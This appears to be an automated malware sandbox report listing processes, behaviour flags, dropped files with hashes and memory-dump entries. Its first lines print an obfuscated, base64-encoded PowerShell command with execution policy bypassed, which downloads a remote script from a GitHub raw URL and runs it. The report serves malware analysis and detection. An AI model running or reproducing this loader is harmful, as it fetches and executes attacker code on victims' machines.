C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES1123.tmpMD5
56f6783e8460c1f78a233cca6f73a100
SHA1457abddbd948afd765ffb4e8f6f0ff80138ad4b2
SHA2561b764879f9a4608afa482a3396f81c08c9c500e1e5973fa09a4f815d6264e356
SHA512b065ffe4ad15568740145e675c41f9f314dea9ad645c371b26b7354bb18e315973d6cbd5da6ae015c246c6812fc46bbe05221311b40d36cac6ac8679a4796b4b
-
C:\Users\Admin\AppData\Local\Temp\RES17BA.tmpMD5
0a1edf3372d4b98b768f820cdff07d11
SHA19a03265e760731fb89813202c2a90a677ae89df3
SHA2561bcfae685002b93e3f0a187e2bfbbcec65dbc2b46bc72a7e8f72b9e695c44ea1
SHA512839b3f088360b0dc934643723d0babb7b85491109bd0d9cabddbc561df3addffa1a9c864ff17db16e8c4cb97db28e7c8232b4bdd3c78865c22a00aa1b8762020
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
906cfa662334c891a46689a3f1da9330
SHA1eeea78f5017291d2bcc9455977849c075077a14a
SHA2565d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
SHA5127d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.dllMD5
09a68093dad29028b020aeeea9329b1d
SHA162a9b5f375813d4917b42249d95cc8f0d9cd5142
SHA256cd8b18073ecc484ff15c22fe7f263a8bf95ea978c0c6958495997f856a0a6f1b
SHA512de32307d15a4110a02c46179921e238edaa992c788a7e1d49a173672212fc204ea049ed255a6d7cdbcc30fa51a11d0fde1de2b8f0ef884835277a5fd696ce707
-
C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.dllMD5
6f19a0dbc09b64d3dd218d77e6eb903c
SHA1e765633c09e689a492e49b5b3cb40c3a3167223a
SHA256ee7e0d3807cbf64be54ee1579eeb519bafa4523ef8474862e844325be345df3c
SHA51224c18b39ae01b5cc4cc00d37933f1edd690dc392b495f13a83826f85bf3a6e1eb58e0dcc349894fe0e786a82b6cfdcdf9fb1d5c040ffccbdfc133981ebfc19c2
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMPMD5
2062d6b60fb3014ccd61c20cc56e7986
SHA19c3dff7f6553eed53597513f55240a8b89bb211b
SHA2568b1fa6516df1816052da07a421e7901bdaf9645cbbaa7f115db6cfd2dc3f6287
SHA5129faf57c764ba8f6738afaad3ca0e23209cef2952687621d7a6dfeeaf6016e65534312b56862a229197d2a0c093c0fca5b803927197ebd91258885f74a891af8c
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.0.csMD5
e0f116150ceec4ea8bb954d973e3b649
SHA186a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA51232f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec
-
\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdlineMD5
15e43ff3b62e9f8f111785d5d854613d
SHA112d27c534d685433787d61088a7a592a38d9d560
SHA2564570df7b3c3a4fe0975b222084f32e4f4ccbdb70ef406aea04f33fbf4c1cf993
SHA51280fef049432b8ad94f7d5db86926b0bda1aa2a6f046da5e43b04a1fdcb8aa308544390d2bb0c48bf8240cc5623d7b490591cfb695c9f907e278c2c5151d242af
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMPMD5
b77d73717cbab75c6615b2fad6b4eea0
SHA1413c1b8c94b59ac08eee72d3ef421df9c360ddfd
SHA256a5559257806e58c8bb58d29a1a4613b8169c93d7c0f6bfcd066661e83512d4d0
SHA51233653fa1770caeaa8b4b620e67a58c1186061df607e43359f8eefd5f4ccb3ec88bb3b5e1a16b16fcc38eb8ffd052941812416150396209d34dddca7c2ebdac0c
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdlineMD5
d4c76f845369468645e3e7ac75aca481
SHA19673558eab6cfe7bc9035be194970a13a92bdbe1
SHA256f6b044879224573c462ae7d46335bd8c0a82dab869f333889b2019906acf7f6f
SHA5126dee4de3a3f514fbc59c754ae16a720794f981a846942ca8609bd29a8234b38e38b3d7a2e6fd957640eeea00d630868d896675610ff7c95d3af67593a2ccf5a7
-
\Windows\Branding\mediasrv.pngMD5
b5a099246bec080e384b19fff56bb2cc
SHA16f26990f3f471717c97dca80a2ccbf2eac952280
SHA256352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA51269dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
-
\Windows\Branding\mediasvc.pngMD5
cc59270baf11196c3414204c319f3be9
SHA1038e2aa526fad8eb762e21e9aed7eab4531d4e11
SHA2565c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
SHA5128e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-
memory/8-351-0x0000000000000000-mapping.dmp
-
memory/520-160-0x0000021CEC5F8000-0x0000021CEC5F9000-memory.dmpFilesize
4KB
-
memory/520-156-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-131-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-138-0x0000021CEC5F3000-0x0000021CEC5F5000-memory.dmpFilesize
8KB
-
memory/520-139-0x0000021CEC5F6000-0x0000021CEC5F8000-memory.dmpFilesize
8KB
-
memory/520-137-0x0000021CEC5F0000-0x0000021CEC5F2000-memory.dmpFilesize
8KB
-
memory/520-126-0x0000021CEC5A0000-0x0000021CEC5A1000-memory.dmpFilesize
4KB
-
memory/520-128-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-162-0x0000021CEDD60000-0x0000021CEDD61000-memory.dmpFilesize
4KB
-
memory/520-125-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-124-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-123-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-146-0x0000021CEC710000-0x0000021CEC711000-memory.dmpFilesize
4KB
-
memory/520-122-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-161-0x0000021CED9D0000-0x0000021CED9D1000-memory.dmpFilesize
4KB
-
memory/520-121-0x0000000000000000-mapping.dmp
-
memory/520-129-0x0000021CEC780000-0x0000021CEC781000-memory.dmpFilesize
4KB
-
memory/520-127-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-135-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmpFilesize
8KB
-
memory/520-155-0x0000021CEC750000-0x0000021CEC751000-memory.dmpFilesize
4KB
-
memory/584-367-0x0000000000000000-mapping.dmp
-
memory/752-352-0x0000000000000000-mapping.dmp
-
memory/884-142-0x0000000000000000-mapping.dmp
-
memory/1036-308-0x0000000000000000-mapping.dmp
-
memory/1048-360-0x0000000000000000-mapping.dmp
-
memory/1304-148-0x0000000000000000-mapping.dmp
-
memory/1388-250-0x0000000000000000-mapping.dmp
-
memory/1388-291-0x00000159997A8000-0x00000159997AA000-memory.dmpFilesize
8KB
-
memory/1388-290-0x00000159997A6000-0x00000159997A8000-memory.dmpFilesize
8KB
-
memory/1388-264-0x00000159997A3000-0x00000159997A5000-memory.dmpFilesize
8KB
-
memory/1388-263-0x00000159997A0000-0x00000159997A2000-memory.dmpFilesize
8KB
-
memory/1456-362-0x0000000000000000-mapping.dmp
-
memory/1712-176-0x0000024D28B60000-0x0000024D28B62000-memory.dmpFilesize
8KB
-
memory/1712-172-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-178-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-180-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-198-0x0000024D28B66000-0x0000024D28B68000-memory.dmpFilesize
8KB
-
memory/1712-170-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-221-0x0000024D28B68000-0x0000024D28B6A000-memory.dmpFilesize
8KB
-
memory/1712-171-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-169-0x0000000000000000-mapping.dmp
-
memory/1712-177-0x0000024D28B63000-0x0000024D28B65000-memory.dmpFilesize
8KB
-
memory/1712-173-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1712-175-0x0000024D103D0000-0x0000024D103D2000-memory.dmpFilesize
8KB
-
memory/1884-365-0x0000000000000000-mapping.dmp
-
memory/1904-371-0x0000000000000000-mapping.dmp
-
memory/1964-261-0x0000022050226000-0x0000022050228000-memory.dmpFilesize
8KB
-
memory/1964-223-0x0000022050223000-0x0000022050225000-memory.dmpFilesize
8KB
-
memory/1964-222-0x0000022050220000-0x0000022050222000-memory.dmpFilesize
8KB
-
memory/1964-210-0x0000000000000000-mapping.dmp
-
memory/1980-370-0x0000000000000000-mapping.dmp
-
memory/1984-366-0x0000000000000000-mapping.dmp
-
memory/2176-356-0x0000000000000000-mapping.dmp
-
memory/2536-136-0x0000000000000000-mapping.dmp
-
memory/2612-359-0x0000000000000000-mapping.dmp
-
memory/2800-363-0x0000000000000000-mapping.dmp
-
memory/2820-383-0x000001FDF9A53000-0x000001FDF9A55000-memory.dmpFilesize
8KB
-
memory/2820-390-0x000001FDF9A56000-0x000001FDF9A58000-memory.dmpFilesize
8KB
-
memory/2820-441-0x000001FDF9A58000-0x000001FDF9A59000-memory.dmpFilesize
4KB
-
memory/2820-346-0x0000000000000000-mapping.dmp
-
memory/2820-382-0x000001FDF9A50000-0x000001FDF9A52000-memory.dmpFilesize
8KB
-
memory/2820-374-0x0000000000000000-mapping.dmp
-
memory/3032-350-0x0000000000000000-mapping.dmp
-
memory/3084-369-0x0000000000000000-mapping.dmp
-
memory/3160-355-0x0000000000000000-mapping.dmp
-
memory/3172-353-0x0000000000000000-mapping.dmp
-
memory/3180-345-0x0000000000000000-mapping.dmp
-
memory/3396-373-0x0000000000000000-mapping.dmp
-
memory/3456-368-0x0000000000000000-mapping.dmp
-
memory/3464-306-0x0000000000000000-mapping.dmp
-
memory/3548-364-0x0000000000000000-mapping.dmp
-
memory/3576-354-0x0000000000000000-mapping.dmp
-
memory/3580-455-0x0000000000000000-mapping.dmp
-
memory/3640-151-0x0000000000000000-mapping.dmp
-
memory/3704-307-0x0000000000000000-mapping.dmp
-
memory/3812-349-0x0000000000000000-mapping.dmp
-
memory/3816-372-0x0000000000000000-mapping.dmp
-
memory/3924-456-0x0000000000000000-mapping.dmp
-
memory/3988-361-0x0000000000000000-mapping.dmp
-
memory/4064-117-0x000001B0A5DE0000-0x000001B0A5DE2000-memory.dmpFilesize
8KB
-
memory/4064-120-0x000001B0A5DE6000-0x000001B0A5DE7000-memory.dmpFilesize
4KB
-
memory/4064-119-0x000001B0A5DE5000-0x000001B0A5DE6000-memory.dmpFilesize
4KB
-
memory/4064-118-0x000001B0A5DE3000-0x000001B0A5DE5000-memory.dmpFilesize
8KB
-
memory/4064-115-0x000001B0C0150000-0x000001B0C041E000-memory.dmpFilesize
2.8MB